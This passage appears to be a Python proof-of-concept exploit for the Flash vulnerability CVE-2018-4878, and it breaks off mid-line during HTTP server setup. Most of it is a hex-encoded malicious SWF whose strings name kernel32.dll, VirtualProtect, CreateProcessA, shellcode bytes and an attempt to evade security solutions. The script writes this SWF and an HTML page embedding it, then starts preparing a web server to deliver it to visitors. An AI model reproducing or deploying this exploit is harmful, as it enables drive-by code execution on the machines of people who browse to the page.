\\x74\\x00\\x10\\x00\\x2E\\x00\\x05\\x00\\x80\\x80\\x80\\x04\\xFF\\xFF\\x03\\x80\\x80\\x04\\x00\\x02\\x00\\x00\\x00\\x00\\xE0\\xFF\\xEF\\x41\\x79\\x06\\x67\\x61\\x64\\x67\\x65\\x74\\x07\\x50\\x72\\x69\\x6D\\x69\\x74\\x31\\x02\\x1E\\x18\\x00\\x3B\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x36\\x2E\\x61\\x73\\x06\\x70\\x61\\x72\\x61\\x6D\\x31\\x04\\x72\\x65\\x73\\x74\\x10\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x66\\x6C\\x61\\x73\\x68\\x31\\x30\\x30\\x30\\x04\\x75\\x69\\x6E\\x74\\x09\\x67\\x61\\x64\\x67\\x65\\x74\\x30\\x24\\x30\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x32\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x35\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x05\\x45\\x72\\x72\\x6F\\x72\\x08\\x70\\x6F\\x73\\x69\\x74\\x69\\x6F\\x6E\\x0C\\x72\\x65\\x61\\x64\\x55\\x54\\x46\\x42\\x79\\x74\\x65\\x73\\x0B\\x74\\x6F\\x4C\\x6F\\x77\\x65\\x72\\x43\\x61\\x73\\x65\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x01\\x6B\\x00\\x01\\x6E\\x01\\x65\\x00\\x00\\x01\\x6C\\x07\\x72\\x65\\x61\\x64\\x55\\x54\\x46\\x01\\x76\\x00\\x01\\x75\\x00\\x01\\x70\\x00\\x01\\x74\\x00\\x01\\x63\\x01\\x72\\x00\\x00\\x00\\x00\\x01\\x73\\x00\\x02\\x62\\x30\\x01\\x62\\x06\\x76\\x61\\x72\\x5F\\x31\\x32\\x04\\x73\\x69\\x7A\\x65\\x03\\x6F\\x66\\x74\\x02\\x66\\x74\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x33\\x03\\x69\\x6E\\x74\\x0E\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x67\\x61\\x64\\x67\\x65\\x74\\x30\\x06\\x70\\x61\\x72\\x61\\x6D\\x32\\x06\\x70\\x61\\x72\\x61\\x6D\\x33\\x07\\x5F\\x6C\\x6F\\x63\\x31\\x30\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x34\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x35\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x36\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x37\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x38\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x39\\x5F\\x07\\x5F\\x6C\\x6F\\x63\\x31\\x31\\x5F\\x07\\x5F\\x6C\\x6F\\x63\\x31\\x32\\x5F\\x09\\x66\\x6C\\x61\\x73\\x68\\x31\\x30\\x30\\x30\\x07\\x66\\x6C\\x61\\x73\\x68\\x37\\x30\\x06\\x56\\x65\\x63\\x74\\x6F\\x72\\x0C\\x67\\x61\\x64\\x67\\x65\\x74\\x2E\\x61\\x73\\x24\\x31\\x35\\x06\\x50\\x72\\x69\\x6D\\x69\\x74\\x0B\\x5F\\x5F\\x41\\x53\\x33\\x5F\\x5F\\x2E\\x76\\x65\\x63\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x36\\x05\\x41\\x72\\x72\\x61\\x79\\x04\\x63\\x61\\x6C\\x6C\\x05\\x61\\x70\\x70\\x6C\\x79\\x0E\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x67\\x61\\x64\\x67\\x65\\x74\\x31\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x24\\x31\\x09\\x75\\x6E\\x64\\x65\\x66\\x69\\x6E\\x65\\x64\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x0F\\x72\\x65\\x61\\x64\\x55\\x6E\\x73\\x69\\x67\\x6E\\x65\\x64\\x49\\x6E\\x74\\x04\\x70\\x75\\x73\\x68\\x06\\x6C\\x65\\x6E\\x67\\x74\\x68\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x34\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x35\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x33\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x35\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x34\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x37\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x38\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x39\\x03\\x72\\x65\\x73\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x34\\x06\\x53\\x74\\x72\\x69\\x6E\\x67\\x0E\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x0D\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x67\\x61\\x64\\x67\\x65\\x74\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x31\\x34\\x35\\x03\\x31\\x37\\x37\\x03\\x32\\x39\\x32\\x03\\x33\\x38\\x32\\x04\\x33\\x32\\x31\\x32\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x04\\x34\\x34\\x31\\x34\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x32\\x31\\x35\\x02\\x39\\x33\\x00\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x37\\x02\\x63\\x72\\x02\\x6E\\x65\\x0C\\x6B\\x65\\x72\\x6E\\x65\\x6C\\x33\\x32\\x2E\\x64\\x6C\\x6C\\x0E\\x76\\x69\\x72\\x74\\x75\\x61\\x6C\\x70\\x72\\x6F\\x74\\x65\\x63\\x74\\x0E\\x63\\x72\\x65\\x61\\x74\\x65\\x70\\x72\\x6F\\x63\\x65\\x73\\x73\\x61\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x11\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x46\\x75\\x6E\\x63\\x08\\x66\\x69\\x6E\\x64\\x66\\x75\\x6E\\x63\\x3A\\x05\\x01\\x16\\x04\\x17\\x04\\x08\\x12\\x05\\x42\\x18\\x01\\x1A\\x01\\x1A\\x43\\x16\\x44\\x16\\x6C\\x16\\x6C\\x17\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x06\\x09\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x08\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x01\\x03\\x09\\x01\\x0A\\x0C\\x04\\x05\\x06\\x07\\x08\\x09\\x08\\x01\\x0A\\x0C\\x04\\x05\\x06\\x07\\x08\\x67\\x07\\x02\\x09\\x07\\x03\\x0B\\x07\\x03\\x0C\\x07\\x03\\x0D\\x07\\x02\\x0E\\x07\\x03\\x75\\x07\\x02\\x0F\\x07\\x02\\x10\\x07\\x04\\x11\\x07\\x02\\x1A\\x07\\x03\\x02\\x07\\x02\\x16\\x07\\x03\\x2B\\x07\\x03\\x2C\\x07\\x03\\x2D\\x07\\x03\\x2E\\x07\\x03\\x2F\\x07\\x03\\x30\\x07\\x03\\x31\\x07\\x03\\x23\\x07\\x02\\x32\\x07\\x03\\x3F\\x07\\x02\\x40\\x09\\x41\\x01\\x07\\x09\\x41\\x1D\\x19\\x01\\x01\\x1B\\x02\\x07\\x03\\x45\\x07\\x03\\x46\\x07\\x02\\x47\\x07\\x04\\x48\\x07\\x04\\x49\\x07\\x02\\x4C\\x07\\x02\\x4D\\x07\\x02\\x4E\\x07\\x02\\x4F\\x07\\x04\\x50\\x07\\x02\\x51\\x07\\x03\\x52\\x07\\x03\\x53\\x07\\x03\\x54\\x07\\x03\\x29\\x07\\x03\\x55\\x07\\x03\\x56\\x07\\x03\\x57\\x07\\x03\\x58\\x07\\x03\\x59\\x07\\x03\\x5A\\x07\\x03\\x5B\\x07\\x02\\x5C\\x07\\x03\\x66\\x07\\x03\\x01\\x07\\x02\\x43\\x09\\x01\\x03\\x07\\x02\\x68\\x07\\x0A\\x6D\\x07\\x0A\\x6E\\x07\\x0A\\x6F\\x07\\x0C\\x66\\x07\\x0A\\x0E\\x07\\x0A\\x16\\x07\\x0A\\x47\\x07\\x0A\\x4C\\x07\\x0A\\x09\\x1D\\x19\\x01\\x40\\x07\\x0A\\x4D\\x07\\x0A\\x4E\\x07\\x0A\\x0F\\x07\\x0A\\x4F\\x07\\x0A\\x51\\x09\\x41\\x04\\x1D\\x19\\x01\\x40\\x07\\x0C\\x46\\x07\\x0C\\x52\\x07\\x0C\\x53\\x07\\x0C\\x0C\\x07\\x0C\\x3F\\x07\\x0C\\x0B\\x07\\x0C\\x45\\x07\\x0C\\x02\\x07\\x0A\\x40\\x1D\\x19\\x01\\x40\\x1B\\x05\\x07\\x0A\\x1A\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x0D\\x07\\x0C\\x76\\x07\\x0A\\x10\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x77\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x78\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x00\\x00\\x04\\x00\\x01\\x00\\x40\\x08\\x8C\\x01\\x01\\x03\\x06\\x00\\x40\\x33\\x02\\x03\\x00\\x40\\x40\\x40\\x4A\\x80\\x06\\x34\\x35\\x00\\x00\\x5D\\x02\\x00\\x00\\x5E\\x00\\x00\\x00\\x04\\x00\\x08\\x5F\\x01\\x60\\x61\\x5F\\x01\\x60\\x62\\x5F\\x01\\x60\\x63\\x5F\\x01\\x60\\x64\\x5F\\x01\\x60\\x65\\x5F\\x01\\x60\\x67\\x69\\x01\\x60\\x6A\\x5F\\x01\\x60\\x6B\\x01\\x34\\x35\\x09\\x06\\x00\\x05\\x00\\x00\\x06\\x5F\\x40\\x01\\x40\\x00\\x01\\x00\\x06\\x40\\x02\\x01\\x00\\x01\\x01\\x4D\\x51\\x03\\x01\\x01\\x02\\x64\\x51\\x04\\x02\\x01\\x03\\x4B\\x51\\x05\\x03\\x01\\x04\\x3B\\x51\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x34\\x44\\x00\\x00\\x02\\x06\\x07\\x07\\x00\\x08\\x01\\x04\\x05\\x0D\\xD0\\x30\\xEF\\x01\\x02\\x00\\x09\\xEF\\x01\\x03\\x01\\x0A\\x47\\x00\\x00\\x01\\x08\\x03\\x04\\x05\\x01\\x47\\x00\\x00\\x02\\x0C\\x03\\x05\\x0A\\xA4\\x06\\xD0\\x30\\x57\\x2A\\xD5\\x30\\x65\\x01\\x24\\x00\\x74\\x6D\\x01\\x65\\x01\\x24\\x00\\x74\\x6D\\x02\\xF0\\x19\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x65\\x01\\x24\\x00\\x74\\x6D\\x04\\xF0\\x1B\\x65\\x01\\x24\\x00\\x74\\x6D\\x05\\xF0\\x1C\\x65\\x01\\x24\\x00\\x74\\x6D\\x06\\x65\\x01\\x24\\x00\\x74\\x6D\\x07\\xF0\\x1E\\x65\\x01\\x24\\x00\\x73\\x6D\\x08\\x65\\x01\\x5D\\x4E\\x5D\\x4C\\x5D\\x57\\x66\\x57\\x46\\x4C\\x01\\x46\\x4E\\x01\\x2F\\x01\\xA8\\x74\\x6D\\x01\\x65\\x01\\x65\\x01\\x6C\\x01\\x2D\\x02\\xA1\\x74\\x6D\\x02\\x10\\x3B\\x00\\x00\\x09\\xF0\\x26\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x46\\x4E\\x01\\x2D\\x03\\xA8\\x25\\xCD\\xB4\\x01\\x14\\x0D\\x00\\x00\\xF0\\x28\\x65\\x01\\x24\\x00\\x74\\x6D\\x01\\x10\\x22\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\x65\\x01\\x65\\x01\\x6C\\x02\\x2D\\x04\\xA1\\x74\\x6D\\x02\\x65\\x01\\x6C\\x03\\x25\\x80\\x04\\x15\\xBA\\xFF\\xFF\\x65\\x01\\x6C\\x01\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x30\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x32\\x5E\\x58\\x65\\x01\\x6C\\x02\\x61\\x58\\xF0\\x33\\x65\\x01\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x24\\x3C\\xA0\\x46\\x4E\\x01\\xA0\\x74\\x6D\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x46\\x4E\\x01\\x25\\xD0\\x8A\\x01\\x14\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x36\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x25\\x84\\x01\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x04\\xF0\\x39\\x65\\x01\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x25\\x80\\x01\\xA0\\x46\\x4E\\x01\\xA0\\x74\\x6D\\x01\\x65\\x01\\x24\\x03\\x24\\x04\\xA2\\x74\\x6D\\x03\\x10\\x70\\x00\\x00\\x09\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x46\\x4E\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x24\\x0C\\x46\\x59\\x01\\x46\\x09\\x00\\x2C\\x72\\x14\\x35\\x00\\x00\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x03\\x24\\x04\\xA2\\xA1\\x46\\x4E\\x01\\x74\\x6D\\x05\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x04\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x06\\xF0\\x42\\x10\\x1B\\x00\\x00\\x65\\x01\\x65\\x01\\x6C\\x03\\x24\\x05\\x24\\x04\\xA2\\xA0\\x74\\x6D\\x03\\x65\\x01\\x6C\\x03\\x65\\x01\\x6C\\x04\\x15\\x84\\xFF\\xFF\\x65\\x01\\x6C\\x05\\x24\\x00\\xAB\\x76\\x2A\\x76\\x11\\x09\\x00\\x00\\x29\\x65\\x01\\x6C\\x06\\x24\\x00\\xAB\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x48\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x4A\\x65\\x01\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x02\\xA0\\x74\\x6D\\x05\\xF0\\x4B\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x10\\xE9\\x00\\x00\\x09\\xF0\\x4E\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x05\\x46\\x4E\\x01\\x74\\x6D\\x01\\x65\\x01\\x6C\\x01\\x24\\x00\\x14\\x0A\\x00\\x00\\xF0\\x51\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x73\\x14\\x38\\x00\\x00\\xF0\\x56\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\x57\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x0E\\x58\\x00\\x00\\x10\\x7E\\x00\\x00\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x74\\x13\\x04\\x00\\x00\\x10\\x31\\x00\\x00\\x5E\\x5F\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x5F\\xF0\\x63\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x17\\x2A\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\xF0\\x6B\\x65\\x01\\x65\\x01\\x6C\\x05\\x24\\x04\\xA0\\x74\\x6D\\x05\\xF0\\x4C\\x65\\x01\\x6C\\x03\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\x06\\xFF\\xFF\\x65\\x01\\x6C\\x07\\x48\\xF0\\x6F\\x10\\x17\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\x71\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x24\\x00\\x48\\x01\\x46\\x84\\x06\\x8A\\x06\\x3C\\x3D\\x08\\x0D\\x00\\x01\\x01\\x00\\x0E\\x00\\x02\\x01\\x00\\x0F\\x00\\x03\\x01\\x00\\x10\\x00\\x04\\x01\\x00\\x11\\x00\\x05\\x01\\x00\\x12\\x00\\x06\\x01\\x00\\x13\\x00\\x07\\x01\\x00\\x14\\x00\\x08\\x15\\x00\\x03\\x0D\\x0D\\x04\\x05\\x86\\x03\\xD0\\x30\\x24\\x00\\x74\\x63\\x04\\x5D\\x4D\\x46\\x4D\\x00\\x29\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x63\\x05\\xF0\\x7C\\x5D\\x4E\\x5D\\x4E\\x5D\\x4E\\x62\\x05\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x14\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x46\\x4E\\x01\\x5D\\x51\\x66\\x51\\x96\\x96\\x12\\x08\\x00\\x00\\x25\\xBC\\x01\\x82\\x10\\x04\\x00\\x00\\x25\\xB0\\x01\\x82\\xA0\\x74\\x63\\x06\\xF0\\x7D\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x2D\\x04\\x15\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x7F\\x62\\x06\\x24\\x04\\xA0\\x74\\x63\\x06\\xF0\\x81\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x06\\xF0\\x82\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x07\\xF0\\x83\\x01\\x5D\\x4E\\x62\\x05\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x74\\x63\\x08\\xF0\\x84\\x01\\x5D\\x4E\\x62\\x05\\x24\\x20\\xA0\\x46\\x4E\\x01\\x74\\x63\\x09\\xF0\\x85\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x25\\x80\\x02\\x42\\x01\\x80\\x5A\\x63\\x0A\\x10\\x24\\x00\\x00\\x09\\xF0\\x88\\x01\\x62\\x0A\\x62\\x04\\x5D\\x4E\\x62\\x07\\x25\\x80\\x01\\xA1\\x62\\x04\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x53\\xF0\\x89\\x01\\x62\\x04\\x91\\x74\\x63\\x04\\xF0\\x86\\x01\\x62\\x04\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\xCC\\xFF\\xFF\\xF0\\x8B\\x01\\x62\\x0A\\x24\\x20\\x24\\x07\\xA0\\xD1\\x61\\x53\\xF0\\x8C\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\xD2\\x46\\x4F\\x02\\x29\\xF0\\x8D\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\xD3\\x46\\x4F\\x02\\x29\\xF0\\x8E\\x01\\x5D\\x4F\\x62\\x06\\x5D\\x49\\x62\\x0A\\x46\\x49\\x01\\x25\\x80\\x01\\xA0\\x46\\x4F\\x02\\x29\\xF0\\x8F\\x01\\x5D\\x3E\\x24\\x41\\x4A\\x3E\\x01\\x80\\x3E\\x63\\x0B\\xF0\\x90\\x01\\x5D\\x4D\\x66\\x4D\\x66\\x1F\\x20\\x62\\x0B\\x46\\x20\\x02\\x82\\x63\\x0C\\xF0\\x91\\x01\\x5D\\x4F\\x62\\x06\\x62\\x07\\x46\\x4F\\x02\\x29\\xF0\\x92\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\x62\\x08\\x46\\x4F\\x02\\x29\\xF0\\x93\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\x62\\x09\\x46\\x4F\\x02\\x29\\xF0\\x94\\x01\\x47\\x00\\x00\\x04\\x0C\\x03\\x05\\x0A\\x92\\x03\\xD0\\x30\\x57\\x2A\\xD5\\x30\\x65\\x01\\x24\\x00\\x6D\\x02\\xF0\\x98\\x01\\x65\\x01\\x20\\x80\\x3E\\x6D\\x01\\xF0\\x99\\x01\\x65\\x01\\x20\\x80\\x65\\x6D\\x03\\xF0\\x9F\\x01\\x65\\x01\\x5D\\x3F\\x66\\x3F\\x82\\x6D\\x08\\xF0\\xA0\\x01\\x65\\x01\\x20\\x85\\x6D\\x09\\xF0\\xA4\\x01\\xF0\\xA4\\x01\\x65\\x01\\x56\\x00\\x80\\x3E\\x6D\\x01\\xF0\\xA5\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x24\\x00\\x61\\x44\\xF0\\xA6\\x01\\x65\\x01\\x24\\x00\\x73\\x6D\\x02\\x10\\x24\\x00\\x00\\x09\\xF0\\xA7\\x01\\x65\\x01\\x6C\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x46\\x45\\x00\\x46\\x25\\x01\\x29\\xF0\\xA6\\x01\\x65\\x01\\x65\\x01\\x6C\\x02\\x24\\x04\\xA0\\x73\\x6D\\x02\\x65\\x01\\x6C\\x02\\x5D\\x42\\x66\\x42\\x66\\x43\\x66\\x46\\x15\\xCC\\xFF\\xFF\\xF0\\xA8\\x01\\x65\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x64\\x65\\x01\\x6C\\x01\\x41\\x01\\x80\\x66\\x6D\\x03\\xF0\\xAA\\x01\\x65\\x01\\x5D\\x49\\x65\\x01\\x6C\\x03\\x46\\x49\\x01\\x74\\x6D\\x04\\xF0\\xAC\\x01\\x65\\x01\\x5D\\x64\\x46\\x64\\x00\\x74\\x6D\\x05\\xF0\\xAD\\x01\\x65\\x01\\x6C\\x05\\x24\\x00\\x13\\x04\\x00\\x00\\x10\\x0B\\x00\\x00\\xF0\\xAF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x4B\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x04\\x65\\x01\\x6C\\x03\\x66\\x46\\x24\\x04\\xA2\\x46\\x4B\\x03\\x29\\x65\\x01\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x6D\\x06\\xF0\\xB4\\x01\\x65\\x01\\x5D\\x4E\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x74\\x6D\\x06\\xF0\\xB5\\x01\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\xB6\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x04\\x46\\x4F\\x02\\x29\\xF0\\xB8\\x01\\x65\\x01\\x5D\\x4D\\x66\\x4D\\x20\\x5D\\x5F\\x66\\x5F\\x46\\x1F\\x02\\x82\\x6D\\x08\\xF0\\xBA\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x07\\x46\\x4F\\x02\\x29\\x47\\x10\\x18\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\xBF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\xC2\\x01\\x47\\x01\\x35\\xF2\\x02\\xF6\\x02\\x3C\\x3D\\x09\\x29\\x00\\x01\\x1E\\x00\\x2A\\x00\\x02\\x15\\x00\\x2B\\x00\\x03\\x1A\\x00\\x2C\\x00\\x04\\x01\\x00\\x2D\\x00\\x05\\x01\\x00\\x2E\\x00\\x06\\x01\\x00\\x2F\\x00\\x07\\x01\\x00\\x30\\x00\\x08\\x00\\x00\\x31\\x00\\x09\\x32\\x00\\x05\\x08\\x01\\x05\\x06\\x0E\\xF1\\x05\\xF0\\x0C\\xD0\\x30\\xF0\\x0E\\xD0\\x49\\x00\\xF0\\x0F\\x47\\x00\\x00\\x06\\x09\\x01\\x01\\x04\\x3D\\xD0\\x30\\x10\\x05\\x00\\x00\\x41\\x05\\x03\\x58\\x04\\xF1\\x05\\xF0\\x07\\x5D\\x36\\x5D\\x37\\x66\\x37\\x10\\x04\\x00\\x00\\x16\\x1F\\x00\\x00\\x30\\x5D\\x35\\x66\\x35\\x30\\x5D\\x35\\x66\\x35\\x58\\x00\\x1D\\x26\\x11\\x06\\x00\\x00\\x47\\x70\\x45\\x0A\\x10\\xD5\\x1D\\x68\\x34\\xF1\\x05\\xF0\\x05\\x47\\x00\\x00\\x1C\\x13\\x02\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x40\\x00\\x00\\x00\"\r\n\r\n\r\nprint \"[+] CVE-2018-4878 poc \"\r\nprint \"[x] files created\"\r\n\r\nswf = \"%s.swf\" % flash_name\r\n \r\nhtml = \"\"\"\r\n<!DOCTYPE html>\r\n<html>\r\n\r\n\"\"\" + \"<embed src=\\\"\" + swf + \"\\\"></embed>\" + \"\"\"\r\n</html>\r\n\"\"\"\r\n \r\nf = open(\"%s\" % swf, \"wb\")\r\nf.write(data)\r\nf.close()\r\n \r\nf = open(\"index.html\", \"wb\")\r\nf.write(html)\r\nf.close()\r\n\r\n\r\nHandlerClass = SimpleHTTPRequestHandler\r\nServerClass = BaseHTTPServer.HTTPServer\r\nProtocol = 